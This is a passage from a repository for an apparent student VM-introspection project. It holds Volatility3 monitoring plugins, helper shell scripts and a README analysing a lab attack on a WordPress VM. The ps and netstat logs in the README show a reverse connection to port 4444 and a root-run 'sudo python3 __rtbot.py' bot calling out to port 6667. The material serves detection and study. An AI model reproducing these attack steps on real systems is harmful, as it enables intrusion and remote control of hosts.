the machine being monitored. The connection information is collected from the `__sk_common` struct, which is referenced inside the `sk` struct that can be obtained by following the instructions in the project task document. Since `__sk_common` cannot be obtained directly like any other member of an object, the `__getattr__` function was used to get the object from the `sk` struct. \nThere were some issues when trying to obtain the file descriptors of some of the tasks. This issue was resolved by using a utility function provided by volatility which obtains all the file descriptors used by a process. \nMore information about the plugin and its dependencies is listed under the [code files](#code-files) section.\n\n## Section 2: Malware detection using VMI with volatility\n### a) Implement an analysis tool\nWe implemented a plugin, **watcher.py**, which reports processes and loaded kernel modules in real time.\nIt requires **findsocket.py** from Section 1, as well as the **lsmod** and **pslist** plugins. 
\n\n- At time 0:\nThe code creates 3 sets: the network connections, the running processes and the kernel modules.\n- At t seconds after the first capture:\nWe get the running processes and check whether they exist in the previous process set (and do the same for kernel modules and network sockets).\nWe also used some helper functions to process the data and store it in lists.\n- At every iteration the memory layer and primary layer are reloaded.\n\n### b) Attack analysis\n\nWhen the attack is initiated by `touch /attack/192.168.13.245`, the attack vm does the following:\n\n<figure align = \"center\">\n  <img src=\"screenshots/attack_begins.PNG\" style=\"width:70%\">\n  <figcaption align = \"center\"><b>Fig.1 - Attack 1</b></figcaption>\n</figure>\n\n\n- Connects to the target vm's wordpress website. (As seen in Fig. 1)\n- Probably logs in to the site as a root user; since the user name and password are generic, it doesn't take long. (As seen in the unix connection of sql in Fig. 1)\n\n<figure align = \"center\">\n  <img src=\"screenshots/attack_2.PNG\" style=\"width:70%\">\n  <figcaption align = \"center\"><b>Fig.2 - Attack 2</b></figcaption>\n</figure>\n\n- Then it resumes the connection to the target vm's wordpress site, after which it makes the target vm connect to the attack vm's port 4444, which is usually used by metasploit but could also be some other malware. (As seen in Fig. 2)\n\n<figure align = \"center\">\n  <img src=\"screenshots/attack_3.PNG\" style=\"width:70%\">\n  <figcaption align = \"center\"><b>Fig.3 - Attack 3</b></figcaption>\n</figure>\n\n<figure align = \"center\">\n  <img src=\"screenshots/attack_4.PNG\" style=\"width:70%\">\n  <figcaption align = \"center\"><b>Fig.4 - Attack 4</b></figcaption>\n</figure>\n\n- After establishing a connection to port 4444, the malware triggers the target to connect to the official wordpress website's port 443, probably to download some plugin (possibly WPterm, but no additional plugins were found after the attack). (As seen in Fig. 3 and Fig. 4)\n\n<figure align = \"center\">\n  <img src=\"screenshots/attack_5.PNG\" style=\"width:70%\">\n  <figcaption align = \"center\"><b>Fig.5 - Attack 5</b></figcaption>\n</figure>\n\n<figure align = \"center\">\n  <img src=\"screenshots/attack_end.PNG\" style=\"width:70%\">\n  <figcaption align = \"center\"><b>Fig.6 - Attack 6</b></figcaption>\n</figure>\n\n- The attack vm has gained the ability to execute shell commands and started an sh command to run python3 with sudo, which in turn connects to the attack vm at port 6667. (As seen in Fig. 5 and Fig. 6)\n\nSince the file `__rtbot.py` wasn't found on the target vm, it was either loaded from a kernel module in between log ticks or was downloaded from the official wordpress website. It is highly unlikely that wordpress would host any malicious files or scripts, so it must be the former.\n\n### c) Comparing VMI results and in-guest results\n\n- **Processes**: The open processes in the in-guest mode, obtained via ps -aux, match the expected open processes obtained by going through the analysis logs.\n- **Modules**: Neither the analysis tool nor the in-guest mode picked up a change in the loaded modules.\n- **Connections**: The python3 process seems to be hiding that it has an open connection, which can be seen in the analysis logs. \n\nThe connection to port 6667 might have been unlinked from the python3 program at the end of the attack. The differences between the outputs obtained from the required commands run in-guest are shown at the bottom. 
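\n\nAs a minimal illustration of the set-difference approach the analysis tool uses (described in part a), the sketch below polls a snapshot function and reports additions and removals between ticks. The `snapshot()` helper and the interval are illustrative placeholders, not part of the actual plugin:\n\n```python\nimport time\n\ndef snapshot():\n    # Placeholder: in the real plugin this would return a set of formatted\n    # strings built from the pslist/lsmod/findsocket output.\n    return set()\n\nprev = snapshot()\nwhile True:\n    time.sleep(5)  # illustrative polling interval\n    curr = snapshot()\n    for gone in prev - curr:  # entries that disappeared since the last tick\n        print('-', gone)\n    for new in curr - prev:   # entries that appeared since the last tick\n        print('+', new)\n    prev = curr\n```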
\n\n## Section 3: Kernel rootkit analysis and prevention\n### a) Use libvmtrace to log information\nWe could get information about syscalls that dynamically load kernel modules at runtime using the following:\n- The SyscallBasic class, which has a function `GetNr()` that returns the number of the system call that has been triggered in the pvm.\n- The LinuxVM class, which contains the following functions:\n `GetCurrentProcess()`: returns information about the process that made the syscall.\n `GetParameter(i)`: returns argument i of the system call; using their contents we could get the parameters of both syscalls 175 and 313.\n \n- We had to create a C program, namely **sim_syscall_175.c**, calling system call 175 in order to catch it in our code, because modprobe and insmod were not generating it.\n\n\n- Then we were able to display those details in the json document using the function document.AddMember().\nWriting the image data to a binary file is done with a fixed-size buffer:\nwe get the address of the image using `GetParameter(0)` (the first argument of syscall 175), then\nloop through the image depending on the length of that data, in exactly _(file_length/BUFFER_LENGTH)_ iterations from that address, and finally write the remainder of length _(file_length%BUFFER_LENGTH)_.\n\n\n### b) Extract file content from fd\n\nAs of now this hasn't been implemented, but it may be ready by the presentation.\n\n### c) Prevent loading a module\n\nPreventing the system call from happening is done by modifying its parameters and nullifying the relevant register.\nWe used LibVMI to set VCPU register RSI (the 2nd argument) to 0: `vmi_set_vcpureg(vmi, addr, RSI, 0)`.\nUsing the boolean variable _prevent_ we can control the behaviour of our code: when it is set, the system call is blocked and cannot happen; otherwise it executes normally.\n\n---------------\n\n## Code Files\n\n### **`linux.findsocket.FindSocket`**: Mohamed Anis, Vidya Sagar \n\nThis can be placed in any of the plugins folders of volatility. It requires `linux.pslist.PsList` and `linux.LinuxUtilities` to function. The `linux.pslist.PsList` plugin provides a classmethod that lists all the tasks in the memory of the monitored system, and `linux.LinuxUtilities` contains a function that obtains information on the file descriptors of all the listed tasks. It has two class methods, `netstat` and `netstatstr`. \n\n`netstat` yields the 'pid', 'ppid', 'comm', 'protocol', 'laddr', 'faddr' and 'state'. If the protocol is unix it yields the 'full_path' instead of 'faddr'. \n`netstatstr` yields a formatted string with the above columns depending on the protocol, sorted by protocol and the port number of the 'laddr'. \n\n\n### **`linux.watcher.Monitor`**: Vidya Sagar\n\nThis, like the `linux.findsocket.FindSocket` plugin, can be placed in any of the plugins folders of volatility. It depends on `linux.lsof.Lsof`, `linux.findsocket.FindSocket`, `linux.pslist.PsList` and their dependencies. \nIt has the following functions: \n* `reload_memory` \n* `get_kern`\n* `get_proc`\n* `get_conn`\n* `get_missing`\n* `get_added`\n* `writer`\n\n**`reload_memory`** clears the primary layer cache and reinitializes the memory layer. \n**`get_kern`** gets the name and offset of the currently loaded kernel modules using the classmethod `lsmod.Lsmod.list_modules`, and adds a formatted string with the above parameters to a set and returns it. 
\n**`get_proc`** gets the pid, ppid and comm of the currently active processes using the classmethod `pslist.PsList.list_tasks`, and adds a formatted string with the above parameters to a set and returns it. \n**`get_conn`** gets the data of the currently active connections using the classmethod `findsocket.FindSocket.netstat`, and adds a formatted string with the above parameters to a set and returns it. \n**`get_missing`** takes arguments prev and curr of the data obtained from one of the above functions and returns a set of removed entries. \n**`get_added`** takes arguments prev and curr of the data obtained from one of the above functions and returns a set of added entries. \n\n\n### **`logvm`**: Vidya Sagar\n\n`logvm` is a shell script which is placed in the ids folder to meet the project requirements. It requires the volatility3 folder to be placed in /root, along with the `linux.watcher.Monitor` plugin and its dependencies. \n\n Usage: logvm <one-xxx> <time-interval>\n\nwhere xxx is the id of the target machine and time-interval is the time between successive logs. \nThe script unmounts `/mnt` if it exists and mounts the `mem` of the machine <one-xxx> to it. \n\n### **`watchvm`**: Vidya Sagar\n\n`watchvm` is a shell script which is placed in the modwatch folder to meet the project requirements. It requires the libvmtrace library to be placed in the /root folder. It also needs the modified versions of `csec.cpp`, `SyscallLogger.cpp` and their dependencies to function properly. \n\n Usage: watchvm <one-xxx> [-p|--prevent|-prevent]\n\nwhere <one-xxx> is the id of the target machine; the optional flag enables preventing the init_module and finit_module syscalls when the module doesn't meet the requirements.\n\nThe script unmounts `/mnt` and mounts the memory of the machine one-xxx at /mnt, then builds the project with make. If the make fails, the csec executable is not run. \n\n### **`csec.cpp`**: Mohamed Anis, Vidya Sagar\n\nThe default `csec.cpp` was modified to register only syscalls 175 and 313. \n\n Usage: csec <one-xxx> [1]\n\nwhere xxx is the id of the target system and the optional parameter prevents the syscalls when set. \n\n### **`SyscallLogger.cpp`**: Mohamed Anis, Vidya Sagar\n\nThe default `SyscallLogger.cpp` was modified to perform the required actions when syscalls 175 and 313 are registered. An additional parameter 'prevent' was added to the constructor to enable preventing syscalls when needed.\n\n---------------------\n\n### Miscellaneous \n\n#### `sim_syscall_175.c`: Mohamed Anis\n\nIt takes a command line argument which it uses as an image when calling the init_module function. It was used to test the functionality of `csec`.\n\n#### `run_syscall.sh`: Vidya Sagar\n\nIt takes one argument with the data, builds sim_syscall_175.c and passes the argument when running its binary.\n\n#### `logs.sh`: Vidya Sagar\n\n Usage: logs.sh [prefix]\n\nwhere the prefix is prepended to the log files of the ps, netstat and lsmod commands. \n\n#### `socket.c`: Mohamed Anis\n\nIt runs a simple server; it was used to test whether the `linux.findsocket.FindSocket` plugin was working as intended.\n\n#### `server.py`: Mohamed Anis\n\nIt runs a simple server; it was used to test whether the `linux.findsocket.FindSocket` plugin was working as intended.\n\n#### `get_diff.sh`: Vidya Sagar\n\nPrints the diff between the log files of the ps, netstat and lsmod commands prefixed with bf and af. 
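\n\nIn practice the two scripts are used as a pair: run `./logs.sh bf` in the guest before triggering the attack, run `./logs.sh af` after it, and then run `./get_diff.sh` to produce the bf_/af_ comparison shown below.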
\n\n```\n########################################## START PS DIFF ##########################################\n*** bf_ps.txt Fri Jul 2 16:34:45 2021\n--- af_ps.txt Fri Jul 2 16:43:32 2021\n***************\n*** 42,74 ****\n root 171 0.0 0.0 0 0 ? I< Jul01 0:00 [kworker/u3:0]\n root 173 0.0 0.0 0 0 ? S Jul01 0:00 [jbd2/xvda1-8]\n root 174 0.0 0.0 0 0 ? I< Jul01 0:00 [ext4-rsv-conver]\n! root 206 0.0 2.3 39084 8268 ? Ss Jul01 0:01 /lib/systemd/systemd-journald\n! root 218 0.0 1.3 21932 4852 ? Ss Jul01 0:00 /lib/systemd/systemd-udevd\n root 240 0.0 1.3 8084 4688 ? Ss Jul01 0:02 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\n root 262 0.0 0.0 0 0 ? I< Jul01 0:00 [ttm_swap]\n root 263 0.0 0.0 0 0 ? I< Jul01 0:00 [nfit]\n! root 301 0.0 1.1 225960 3848 ? Ssl Jul01 0:00 /usr/sbin/rsyslogd -n -iNONE\n! root 302 0.0 2.0 19428 7104 ? Ss Jul01 0:00 /lib/systemd/systemd-logind\n message+ 303 0.0 0.9 8612 3488 ? Ss Jul01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only\n! unscd 304 0.0 0.4 2516 1560 ? Ss Jul01 0:00 /usr/sbin/nscd -d\n root 305 0.0 0.7 7180 2600 ? Ss Jul01 0:00 /usr/sbin/cron -f\n! root 736 0.0 0.2 4088 756 hvc0 Ss+ Jul01 0:00 /sbin/agetty -o -p -- \\u --keep-baud 115200,38400,9600 hvc0 vt220\n root 740 0.0 0.2 2564 748 tty1 Ss+ Jul01 0:00 /sbin/agetty -o -p -- \\u --noclear tty1 linux\n! ntp 743 0.0 0.9 76468 3156 ? Ssl Jul01 0:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 106:112\n! root 750 0.0 1.9 15768 6912 ? Ss Jul01 0:00 /usr/sbin/sshd -D\n! mysql 802 0.0 23.4 1254576 82068 ? Ssl Jul01 0:50 /usr/sbin/mysqld\n! root 804 0.0 9.2 234760 32196 ? Ss Jul01 0:04 /usr/sbin/apache2 -k start\n! www-data 2095 0.0 2.6 234784 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! www-data 2096 0.0 2.6 234784 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n www-data 2097 0.0 3.0 234848 10612 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n www-data 2098 0.0 2.6 234800 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! www-data 2099 0.0 2.6 234784 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! root 4002 0.0 0.0 0 0 ? I 16:09 0:00 [kworker/0:0-cgroup_destroy]\n! root 4031 0.0 0.0 0 0 ? I 16:28 0:00 [kworker/0:1-events_power_efficient]\n! root 4033 0.0 2.2 16612 7980 ? Ss 16:28 0:00 sshd: root@pts/0\n root 4036 0.0 2.3 21028 8272 ? Ss 16:28 0:00 /lib/systemd/systemd --user\n root 4037 0.0 0.6 104868 2420 ? S 16:28 0:00 (sd-pam)\n! root 4050 0.0 1.1 4708 4048 pts/0 Ss 16:28 0:00 -bash\n www-data 4066 0.0 2.6 234784 9104 ? S 16:33 0:00 /usr/sbin/apache2 -k start\n! root 4074 0.0 0.7 3652 2724 pts/0 S+ 16:34 0:00 /bin/bash ./logs.sh bf\n! root 4075 0.0 0.3 7556 1264 pts/0 R+ 16:34 0:00 ps -aux\n--- 42,79 ----\n root 171 0.0 0.0 0 0 ? I< Jul01 0:00 [kworker/u3:0]\n root 173 0.0 0.0 0 0 ? S Jul01 0:00 [jbd2/xvda1-8]\n root 174 0.0 0.0 0 0 ? I< Jul01 0:00 [ext4-rsv-conver]\n! root 206 0.0 2.3 39084 8216 ? Ss Jul01 0:01 /lib/systemd/systemd-journald\n! root 218 0.0 1.3 21932 4824 ? Ss Jul01 0:00 /lib/systemd/systemd-udevd\n root 240 0.0 1.3 8084 4688 ? Ss Jul01 0:02 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\n root 262 0.0 0.0 0 0 ? I< Jul01 0:00 [ttm_swap]\n root 263 0.0 0.0 0 0 ? I< Jul01 0:00 [nfit]\n! root 301 0.0 1.0 225960 3748 ? Ssl Jul01 0:00 /usr/sbin/rsyslogd -n -iNONE\n! root 302 0.0 2.0 19428 7088 ? Ss Jul01 0:00 /lib/systemd/systemd-logind\n message+ 303 0.0 0.9 8612 3488 ? Ss Jul01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only\n! unscd 304 0.0 0.4 2516 1476 ? 
Ss Jul01 0:00 /usr/sbin/nscd -d\n root 305 0.0 0.7 7180 2600 ? Ss Jul01 0:00 /usr/sbin/cron -f\n! root 736 0.0 0.2 4088 752 hvc0 Ss+ Jul01 0:00 /sbin/agetty -o -p -- \\u --keep-baud 115200,38400,9600 hvc0 vt220\n root 740 0.0 0.2 2564 748 tty1 Ss+ Jul01 0:00 /sbin/agetty -o -p -- \\u --noclear tty1 linux\n! ntp 743 0.0 0.8 76468 3056 ? Ssl Jul01 0:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 106:112\n! root 750 0.0 1.9 15768 6832 ? Ss Jul01 0:00 /usr/sbin/sshd -D\n! mysql 802 0.0 23.5 1254876 82488 ? Ssl Jul01 0:51 /usr/sbin/mysqld\n! root 804 0.0 9.1 234760 31968 ? Ss Jul01 0:04 /usr/sbin/apache2 -k start\n! www-data 2095 0.0 5.4 234832 18944 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! www-data 2096 0.0 9.2 237112 32276 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n www-data 2097 0.0 3.0 234848 10612 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n www-data 2098 0.0 2.6 234800 9104 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! www-data 2099 0.0 9.4 309660 33052 ? S 00:00 0:00 /usr/sbin/apache2 -k start\n! root 4002 0.0 0.0 0 0 ? I 16:09 0:00 [kworker/0:0-events_power_efficient]\n! root 4031 0.0 0.0 0 0 ? I 16:28 0:00 [kworker/0:1-events]\n! root 4033 0.0 2.2 16612 7832 ? Ss 16:28 0:00 sshd: root@pts/0\n root 4036 0.0 2.3 21028 8272 ? Ss 16:28 0:00 /lib/systemd/systemd --user\n root 4037 0.0 0.6 104868 2420 ? S 16:28 0:00 (sd-pam)\n! root 4050 0.0 1.0 4708 3760 pts/0 Ss 16:28 0:00 -bash\n www-data 4066 0.0 2.6 234784 9104 ? S 16:33 0:00 /usr/sbin/apache2 -k start\n! www-data 4136 0.0 2.6 234784 9108 ? S 16:41 0:00 /usr/sbin/apache2 -k start\n! root 4138 0.0 0.0 0 0 ? I 16:41 0:00 [kworker/0:2]\n! www-data 4140 0.0 2.6 234784 9108 ? S 16:41 0:00 /usr/sbin/apache2 -k start\n! www-data 4147 0.0 0.1 2388 692 ? S 16:41 0:00 sh -c sudo python3 __rtbot.py\n! root 4148 0.0 0.9 7160 3372 ? S 16:41 0:00 sudo python3 __rtbot.py\n! root 4159 0.0 0.7 3652 2692 pts/0 S+ 16:43 0:00 /bin/bash ./logs.sh af\n! 
root 4160 0.0 0.3 7556 1208 pts/0 R+ 16:43 0:00 ps -aux\n########################################### END PS DIFF ###########################################\n\n########################################## START LSMOD DIFF ##########################################\n########################################### END LSMOD DIFF ###########################################\n\n########################################## START NETSTAT DIFF ##########################################\n*** bf_netstat.txt Fri Jul 2 16:34:45 2021\n--- af_netstat.txt Fri Jul 2 16:43:32 2021\n***************\n*** 2,11 ****\n Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name\n tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 802/mysqld\n tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 750/sshd\n tcp 0 36 192.168.13.245:22 10.42.13.11:51159 ESTABLISHED 4033/sshd: root@pts\n tcp6 0 0 :::80 :::* LISTEN 804/apache2\n tcp6 0 0 :::22 :::* LISTEN 750/sshd\n- tcp6 0 0 192.168.13.245:80 10.42.13.11:55377 FIN_WAIT2 -\n udp 0 0 192.168.13.245:123 0.0.0.0:* 743/ntpd\n udp 0 0 127.0.0.1:123 0.0.0.0:* 743/ntpd\n udp 0 0 0.0.0.0:123 0.0.0.0:* 743/ntpd\n--- 2,12 ----\n Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name\n tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 802/mysqld\n tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 750/sshd\n+ tcp 0 0 192.168.13.245:49364 192.168.13.19:6667 ESTABLISHED -\n tcp 0 36 192.168.13.245:22 10.42.13.11:51159 ESTABLISHED 4033/sshd: root@pts\n+ tcp 72 0 192.168.13.245:49200 192.168.13.19:4444 CLOSE_WAIT 4147/sh\n tcp6 0 0 :::80 :::* LISTEN 804/apache2\n tcp6 0 0 :::22 :::* LISTEN 750/sshd\n udp 0 0 192.168.13.245:123 0.0.0.0:* 743/ntpd\n udp 0 0 127.0.0.1:123 0.0.0.0:* 743/ntpd\n udp 0 0 0.0.0.0:123 0.0.0.0:* 743/ntpd\n***************\n*** 23,29 ****\n unix 2 [ ACC ] STREAM LISTENING 12663 304/nscd /var/run/nscd/socket\n unix 2 [ ACC ] STREAM LISTENING 12665 304/nscd /var/run/.nscd_socket\n unix 2 [ ACC ] STREAM LISTENING 15493 802/mysqld /run/mysqld/mysqld.sock\n! unix 7 [ ] DGRAM 10386 1/init /run/systemd/journal/dev-log\n unix 2 [ ACC ] SEQPACKET LISTENING 10164 1/init /run/udev/control\n unix 2 [ ACC ] STREAM LISTENING 12247 1/init /var/run/dbus/system_bus_socket\n unix 2 [ ] DGRAM 10208 1/init /run/systemd/journal/syslog\n--- 24,30 ----\n unix 2 [ ACC ] STREAM LISTENING 12663 304/nscd /var/run/nscd/socket\n unix 2 [ ACC ] STREAM LISTENING 12665 304/nscd /var/run/.nscd_socket\n unix 2 [ ACC ] STREAM LISTENING 15493 802/mysqld /run/mysqld/mysqld.sock\n! 
unix 8 [ ] DGRAM 10386 1/init /run/systemd/journal/dev-log\n unix 2 [ ACC ] SEQPACKET LISTENING 10164 1/init /run/udev/control\n unix 2 [ ACC ] STREAM LISTENING 12247 1/init /var/run/dbus/system_bus_socket\n unix 2 [ ] DGRAM 10208 1/init /run/systemd/journal/syslog\n***************\n*** 72,79 ****\n--- 73,83 ----\n unix 3 [ ] DGRAM 11464 1/init\n unix 2 [ ] DGRAM 33039 4033/sshd: root@pts\n unix 3 [ ] STREAM CONNECTED 33267 303/dbus-daemon /var/run/dbus/system_bus_socket\n+ unix 2 [ ] DGRAM 33867 4148/sudo\n unix 2 [ ] STREAM CONNECTED 33010 4033/sshd: root@pts\n+ unix 3 [ ] STREAM CONNECTED 33884 -\n unix 3 [ ] STREAM CONNECTED 15231 750/sshd\n+ unix 3 [ ] STREAM CONNECTED 33885 -\n unix 3 [ ] STREAM CONNECTED 15232 1/init /run/systemd/journal/stdout\n unix 3 [ ] STREAM CONNECTED 11540 1/init /run/systemd/journal/stdout\n unix 3 [ ] STREAM CONNECTED 12648 1/init /run/systemd/journal/stdout\n########################################### END NETSTAT DIFF ###########################################\n```\n\n" }, { "alpha_fraction": 0.6072797179222107, "alphanum_fraction": 0.6360152959823608, "avg_line_length": 15.838709831237793, "blob_id": "982771e754e15d1fe678c155adc57ddef1fec330", "content_id": "cb91838132d0cf2fa0c25cc3e59160d23d0fdbe6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 522, "license_type": "no_license", "max_line_length": 79, "num_lines": 31, "path": "/vm-logger/logvm", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# Kills program with name volatility3 in it\nfunction kill_monitor () {\n pkill -f volatility3\n}\n\ntrap 'kill_monitor' INT\n\nif [[ $1 == '' || $2 == '' ]]\nthen \n echo \"Usage: <path-to-$0>/$0 <one-XXXX> <TIME_INTERVAL>. Here one-1279\" \n exit 0\nfi\n\ntime_interval=$2\n\n# To make sure the correct vm is being monitored\nif [[ -f /mnt/mem ]]\nthen\n umount /mnt\nfi\n\nvmifs name $1 /mnt\n\nold_wd=$(pwd)\ncd /root/volatility3\n\npython3 -m vol -f /mnt/mem linux.watcher --time-interval $time_interval\n\ncd $old_wd\n" }, { "alpha_fraction": 0.4743083119392395, "alphanum_fraction": 0.4743083119392395, "avg_line_length": 18.461538314819336, "blob_id": "033ba3bdb6c9e91fb0e099ba0e65dafa32b632eb", "content_id": "c8d385df45a9976a3a69b0e9ceca83e5ad6346cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 253, "license_type": "no_license", "max_line_length": 48, "num_lines": 13, "path": "/scripts/get_diff.sh", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncomms=(ps lsmod netstat)\n\nsep=\"##########################################\"\n\nfor comm in \"${comms[@]}\"\ndo\n\techo \"$sep START ${comm^^} DIFF $sep\"\n\tdiff -u \"bf_${comm}.txt\" \"af_${comm}.txt\"\n\techo \"$sep# END ${comm^^} DIFF $sep#\"\n\techo ''\ndone\n" }, { "alpha_fraction": 0.5784313678741455, "alphanum_fraction": 0.5915032625198364, "avg_line_length": 15.94444465637207, "blob_id": "032d5c3d50301ac427b30d340c571d6bd60cf935", "content_id": "43140d8ddc47237b3acc6b0d894d6cd1d78e99c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 306, "license_type": "no_license", "max_line_length": 61, "num_lines": 18, "path": "/scripts/logs.sh", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nwhile [[ $# -gt 0 ]]\ndo\n\tcase $1 in\n\t-h|--help) \n\t\techo \"Usage: ./logs.sh <prefix>\"\n\t\techo \"logs ps, netstat and lsmod into 
<prefix>_command.txt\"\n\t\texit 0;;\n\t*)\n\t\tprefix=$1;;\n\tesac\n\tshift\ndone\n\nps -aux > \"${prefix}_ps.txt\"\nlsmod > \"${prefix}_lsmod.txt\"\nnetstat -nap > \"${prefix}_netstat.txt\"\n\n" }, { "alpha_fraction": 0.5388649702072144, "alphanum_fraction": 0.548547625541687, "avg_line_length": 39.18378448486328, "blob_id": "80b9d04aafa72c4b125228552669977108a31bf8", "content_id": "bf84657d622cf90fad5ebdf4a0d65b1d2cbc22bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7436, "license_type": "no_license", "max_line_length": 176, "num_lines": 185, "path": "/volatility3/plugins/linux/watcher.py", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "# This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0\n# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0\n#\n\"\"\"A module containing a collection of plugins that produce data typically\nfound in Linux's /proc file system.\"\"\"\n\nimport logging\nfrom typing import List, Iterable\n\nfrom volatility3.framework import contexts\nfrom volatility3.framework import exceptions, renderers, constants, interfaces\nfrom volatility3.framework.configuration import requirements\nfrom volatility3.framework.interfaces import plugins\nfrom volatility3.framework.objects import utility\nfrom volatility3.framework.renderers import format_hints\nfrom volatility3.plugins.linux import lsmod, findsocket, pslist\nfrom volatility3.cli import volargparse\nimport time\n\nvollog = logging.getLogger(__name__)\noffset_format = \"{0:<16}\"\nname_format = \"{0:<20}\"\nsize_format = \"{0:<10}\"\n\nclass Monitor(plugins.PluginInterface):\n    \"\"\"Monitors processes, kernel modules and network connections in real time.\"\"\"\n    \n    CLI_NAME = 'volatility'\n\n    _required_framework_version = (1, 0, 0)\n    _version = (1, 0, 0)\n\n    @classmethod\n    def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:\n        return [\n            requirements.TranslationLayerRequirement(name = 'primary',\n                                                     description = 'Memory layer for the kernel',\n                                                     architectures = [\"Intel32\", \"Intel64\"]),\n            requirements.PluginRequirement(name = 'lsmod', plugin = lsmod.Lsmod, version = (1, 0, 0)),\n            requirements.PluginRequirement(name = 'findsocket', plugin = findsocket.FindSocket, version = (1, 0, 0)),\n            requirements.PluginRequirement(name = 'pslist', plugin = pslist.PsList, version = (1, 0, 0)),\n            requirements.ListRequirement(name = 'time-interval',\n                                         description = 'Time between each read',\n                                         element_type = int,\n                                         default = [-1],\n                                         optional = True),\n            requirements.SymbolTableRequirement(name = \"vmlinux\", description = \"Linux kernel symbols\")\n        ]\n\n    def _generator(self):\n        return\n\n    def reload_memory(self):\n        \"\"\"Clears the primary layer cache and reinitializes the memory layer.\"\"\"\n        \n        ml = self.context.layers['memory_layer']\n        ml.__init__(ml.context, ml.config_path, ml.name)\n        \n        pl = self.context.layers[self.config['primary']]\n        pl._get_valid_table.cache_clear()\n\n    def get_conn(self):\n        \"\"\"Returns a set of formatted strings describing the currently active connections.\"\"\"\n        conn_set = set()\n        for pid, _, name, protocol, laddr, faddr, _, full_path in findsocket.FindSocket.netstat(self.context, self.config['primary'], self.config['vmlinux'], self.config_path):\n            l_to_f = f\"{laddr.strip():<21}\" +' > '+ f\"{faddr.strip():<21}\"\n            pid_name = pid.strip()+'/'+name\n            if 'UNIX' in protocol:\n                conn_set.add(f\"{protocol:<6} {l_to_f:<50} {pid_name:<20} {full_path}\")\n            else:\n                conn_set.add(f\"{protocol:<6} {l_to_f:<50} {pid_name}\")\n\n        return conn_set\n    \n    
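# Each getter below returns a set of pre-formatted strings, so that plain set\n    # differences are enough to detect additions and removals between ticks.\n    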
def get_proc(self):\n        \"\"\"Returns a set of formatted strings (pid, ppid, comm) for the active processes.\"\"\"\n        proc_set = set()\n        for task in pslist.PsList.list_tasks(self.context, self.config['primary'], self.config['vmlinux']):\n            pid = task.pid\n            ppid = 0\n            if task.parent:\n                ppid = task.parent.pid\n            name = utility.array_to_string(task.comm)\n            proc_set.add(f\"{pid:<6} {ppid:<6} {name:<}\")\n\n        return proc_set\n    \n    def get_kern(self):\n        \"\"\"Returns a set of formatted strings (offset, name) for the loaded kernel modules.\"\"\"\n        kern_set = set()\n        for module in lsmod.Lsmod.list_modules(self.context, self.config['primary'], self.config['vmlinux']):\n            name = utility.array_to_string(module.name)\n            offset = module.vol.offset\n            kern_set.add(f\"{hex(offset):<15} {name:<}\")\n\n        return kern_set\n\n    def get_missing(self, \n                    prev: set, \n                    curr: set) -> set:\n        return prev - curr\n\n    def get_added(self, \n                  prev: set, \n                  curr: set) -> set:\n        return curr - prev\n    \n    def run(self): \n        \"\"\"\n        Polls the memory image every time-interval seconds and prints the\n        processes, kernel modules and network connections that appeared or\n        disappeared since the previous tick.\n        \"\"\"\n        first_iter = True\n        time_interval = self.config['time-interval'][0]\n        self.reload_memory()\n\n        print(f\"Logging Started {time.strftime('%d/%m/%Y %H:%M:%S',time.localtime())}. Interval {time_interval}s\")\n        print(\"Ctrl+C to exit\\n\", flush = True)\n        try:\n            while True:\n                exec_start_time = time.time()\n\n                curr_kernels = self.get_kern()\n                curr_processes = self.get_proc()\n                curr_connections = self.get_conn()\n\n                if not first_iter:\n                    stopped_processes = self.get_missing(prev_processes, curr_processes)\n                    unloaded_kernels = self.get_missing(prev_kernels, curr_kernels)\n                    closed_connections = self.get_missing(prev_connections, curr_connections)\n\n                    started_processes = self.get_added(prev_processes, curr_processes)\n                    loaded_kernels = self.get_added(prev_kernels, curr_kernels)\n                    new_connections = self.get_added(prev_connections, curr_connections)\n\n                    print(time.strftime(\"%d/%m/%Y %H:%M:%S\", time.localtime()))\n                    if len(stopped_processes) > 0 or len(started_processes) > 0:\n                        print(\"Processes: (pid, ppid, name)\")\n                        writer(stopped_processes, started_processes)\n                    else:\n                        print(\"No process update.\")\n                    \n                    if len(unloaded_kernels) > 0 or len(loaded_kernels) > 0:\n                        print(\"Kernel Modules: (offset, name)\")\n                        writer(unloaded_kernels, loaded_kernels)\n                    else:\n                        print(\"No kernel module update.\")\n\n                    if len(closed_connections) > 0 or len(new_connections) > 0: \n                        print(\"Network Sockets: (Protocol, laddr -> faddr, 